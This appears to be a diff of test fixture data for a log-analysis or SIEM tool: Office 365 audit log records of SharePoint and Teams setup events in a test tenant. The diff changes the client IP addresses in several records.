-{"CreationTime":"2021-02-05T09:08:14","Id":"20b7fc96-6e31-437a-50fa-08d8c9b59185","Operation":"ListCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":36,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"52.114.88.180","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/SiteAssets","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-4077-2000-7abb-cbd546e4157d","EventSource":"SharePoint","ItemType":"List","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","ListBaseTemplateType":"DocumentLibrary","ListBaseType":"DocumentLibrary","ListTitle":"96CDFC22-2B86-49EA-B4E9-F11888B1665D"} -{"CreationTime":"2021-02-05T09:08:17","Id":"3813eef0-90e1-4758-54d8-08d8c9b5938e","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/03e45e84-1992-4d42-9116-26f756012634","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-
2b86-49ea-b4e9-f11888b1665d"} -{"CreationTime":"2021-02-05T09:08:17","Id":"597a6c1b-fa1f-46aa-f2ce-08d8c9b5938b","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/0c5e0085-eb30-494b-9cdd-ece1d3c649a2","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"} 
-{"CreationTime":"2021-02-05T09:08:17","Id":"f4579e76-fb4b-4434-904e-08d8c9b59389","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/39360f11-34cf-4356-9945-25c44e68dade","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"} 
-{"CreationTime":"2021-02-05T09:08:17","Id":"b401dd51-f4a2-477f-cc42-08d8c9b59384","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/03e45e84-1992-4d42-9116-26f756012634","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"} 
-{"CreationTime":"2021-02-05T09:08:17","Id":"073f437c-2e04-441a-05ad-08d8c9b59380","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/0c5e0085-eb30-494b-9cdd-ece1d3c649a2","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"} 
-{"CreationTime":"2021-02-05T09:08:17","Id":"8f586afb-1438-475e-a4d5-08d8c9b5937d","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/39360f11-34cf-4356-9945-25c44e68dade","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"} +{"CreationTime":"2021-02-05T09:08:14","Id":"32474de1-fca7-4d81-4f97-08d8c9b591a4","Operation":"ListUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":36,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"81.2.69.143","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams 
Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-4077-2000-7abb-cbd546e4157d","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"List","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":0,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"} +{"CreationTime":"2021-02-05T09:08:14","Id":"20b7fc96-6e31-437a-50fa-08d8c9b59185","Operation":"ListCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":36,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"81.2.69.143","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/SiteAssets","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-4077-2000-7abb-cbd546e4157d","EventSource":"SharePoint","ItemType":"List","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","ListBaseTemplateType":"DocumentLibrary","ListBaseType":"DocumentLibrary","ListTitle":"96CDFC22-2B86-49EA-B4E9-F11888B1665D"} 
+{"CreationTime":"2021-02-05T09:08:17","Id":"3813eef0-90e1-4758-54d8-08d8c9b5938e","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"175.16.199.1","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/03e45e84-1992-4d42-9116-26f756012634","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"} 
+{"CreationTime":"2021-02-05T09:08:17","Id":"597a6c1b-fa1f-46aa-f2ce-08d8c9b5938b","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"175.16.199.1","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/0c5e0085-eb30-494b-9cdd-ece1d3c649a2","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"} 
+{"CreationTime":"2021-02-05T09:08:17","Id":"f4579e76-fb4b-4434-904e-08d8c9b59389","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"175.16.199.1","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/39360f11-34cf-4356-9945-25c44e68dade","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"} 
+{"CreationTime":"2021-02-05T09:08:17","Id":"b401dd51-f4a2-477f-cc42-08d8c9b59384","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"175.16.199.1","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/03e45e84-1992-4d42-9116-26f756012634","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"} 
+{"CreationTime":"2021-02-05T09:08:17","Id":"073f437c-2e04-441a-05ad-08d8c9b59380","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"175.16.199.1","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/0c5e0085-eb30-494b-9cdd-ece1d3c649a2","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"} 
+{"CreationTime":"2021-02-05T09:08:17","Id":"8f586afb-1438-475e-a4d5-08d8c9b5937d","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"175.16.199.1","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/39360f11-34cf-4356-9945-25c44e68dade","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"} {"CreationTime":"2021-02-05T09:08:00","Id":"9b9e973b-64c3-4607-bc79-bf743c985051","Operation":"TeamCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":25,"UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":2,"Version":1,"Workload":"MicrosoftTeams","UserId":"root@testsiem4.onmicrosoft.com","TeamGuid":"19:5b5e23f8af084c2188311d38cd51ac0f@thread.tacv2","TeamName":"users"} {"CreationTime":"2021-02-05T09:07:58","Id":"f16cc0cc-2a18-580e-83c5-04d3c385ebb8","Operation":"MemberAdded","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":25,"UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"MicrosoftTeams","UserId":"root@testsiem4.onmicrosoft.com","AADGroupId":"61b6d6f5-7aa0-437b-a967-fbcd39ec90a1","CommunicationType":"Team","Members":[{"DisplayName":"Adrian 
Serrano","Role":2,"UPN":"admin@testsiem4.onmicrosoft.com"},{"DisplayName":"Eve","Role":2,"UPN":"eve@testsiem4.onmicrosoft.com"}],"TeamGuid":"19:5b5e23f8af084c2188311d38cd51ac0f@thread.tacv2","ItemName":"users","TeamName":"users"} -{"CreationTime":"2021-02-05T09:08:13","Id":"6454a7d9-afae-4a6c-ffa5-08d8c9b5911c","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"52.114.88.180","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/28cf69c5-fa48-462a-b5cd-27b6f9d2bd5f","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-5054-2000-9ced-83aa1cf560fd","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"} -{"CreationTime":"2021-02-05T09:08:12","Id":"6d69552c-2019-4f7c-92bc-08d8c9b5908b","Operation":"FolderCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":6,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"52.114.88.180","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/Shared Documents\/General","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams 
Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-b01b-2000-9ced-879789d2d8e5","EventSource":"SharePoint","ItemType":"Folder","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","ListItemUniqueId":"81d4cd08-7ffb-45d2-a422-86a9a9335d66","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","SourceFileExtension":"","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/","SourceFileName":"General","SourceRelativeUrl":"Shared Documents"} 
+{"CreationTime":"2021-02-05T09:08:13","Id":"6454a7d9-afae-4a6c-ffa5-08d8c9b5911c","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"81.2.69.143","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/28cf69c5-fa48-462a-b5cd-27b6f9d2bd5f","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-5054-2000-9ced-83aa1cf560fd","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"} 
+{"CreationTime":"2021-02-05T09:08:12","Id":"6d69552c-2019-4f7c-92bc-08d8c9b5908b","Operation":"FolderCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":6,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"81.2.69.143","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/Shared Documents\/General","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-b01b-2000-9ced-879789d2d8e5","EventSource":"SharePoint","ItemType":"Folder","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","ListItemUniqueId":"81d4cd08-7ffb-45d2-a422-86a9a9335d66","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","SourceFileExtension":"","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/","SourceFileName":"General","SourceRelativeUrl":"Shared Documents"} 
{"CreationTime":"2021-02-05T09:07:57","Id":"6e9fc7e0-158a-4456-2a89-08d8c9b58771","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Members<\/Group>","TargetUserOrGroupType":"SecurityGroup","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"Everyone except external users"} 
{"CreationTime":"2021-02-05T09:07:56","Id":"a9b8277d-d3b9-4d99-0491-08d8c9b5874b","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Owners<\/Group>","TargetUserOrGroupType":"Member","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"SHAREPOINT\\system"} 
{"CreationTime":"2021-02-05T09:07:56","Id":"dfef0880-e895-47e1-2e39-08d8c9b58733","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Owners<\/Group>","TargetUserOrGroupType":"SecurityGroup","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"users Owners"} 
{"CreationTime":"2021-02-05T09:07:56","Id":"d9b6f410-30c7-42a0-0820-08d8c9b5872c","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Members<\/Group>","TargetUserOrGroupType":"SecurityGroup","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"users Members"} 
{"CreationTime":"2021-02-05T09:07:56","Id":"5c82c14e-525e-44f4-7cd7-08d8c9b58722","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Owners<\/Group>","TargetUserOrGroupType":"Member","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"SHAREPOINT\\system"} 
